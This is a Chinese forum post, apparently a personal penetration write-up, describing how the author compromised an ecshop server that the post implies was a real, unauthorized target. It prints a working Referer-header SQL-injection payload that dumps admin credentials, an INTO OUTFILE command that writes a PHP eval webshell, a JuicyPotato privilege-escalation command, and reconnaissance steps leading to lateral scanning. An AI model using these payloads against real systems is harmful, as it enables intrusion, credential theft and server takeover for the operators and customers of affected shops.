介绍1

最近学习了一下ecshop的RCE,网上的payload也相当成熟.这里是前辈发出的ecshop2.x和3.x的payload,前辈们已经把漏洞原理写的非常清楚了。这

做梦梦到的一台ecshop的机器

直接一手RCEpayload打上去,这里很明显的mysql报错。

菜鸡的我分析了好久才知道这里的id被处理了

很明显的near附近的''重叠在了一起并没有被注释所以报错了,这个payload的原理是通过可控函数造成sql注入得到结果满足判断条件进行代码执行。payload原理点这里。那这里我们并不能直接命令执行。这里直接上我们的payload。

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:3:"669";s:2:"id";s:103:"updatexml(1,concat(0x7e,(select group_concat(user_name,0x7e,password) from webpos.ecs_admin_user)),1) #";}

效果如下

这里的updatexml()报错注入每次只能返回32位,我们可以借助字符串切割函数来显示任意位数的数据,可以使用mid(),或者substr()。

这里的上网查到加密方式为salt加密,这里我们也可以通过报错注入得到salt值,在线网上解密得到密码为rootroot,这里可以吐了,早知道直接上一手爆破他不香吗?
我们来到后台,这里有一个sql查询,权限全开

这个时候sql权限够直接上这个,结果好多文件夹是禁止访问的,直接写是写不上的就算写了也访问不到的。这里找了个xxx的文件夹可以写文件。但是日志是写不进去的,只能够创建文件

show variables like '%secure%';
Select '<?php eval($_POST[cmd])?>' into outfile 'E://zz//zz//zz.php';


这里写上去,漂亮的界面就出现了

cs上线,无杀软。
信息收集一手

ipconfig /all
whoami /all
systeminfo

无补丁,工作组,windows 2012 server data,这里的用户是iuser,提权。这里用的是土豆家族的提权。

juicypotato.exe -p "whoami" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}


这里我们拿下它,接着扫扫c段,看看端口。

这里再附上机器的ecshop id处理。

第一次写文章,众多地方细节还未理解清楚,还望多多海涵。

点击收藏 | 0 关注 | 1
登录 后跟帖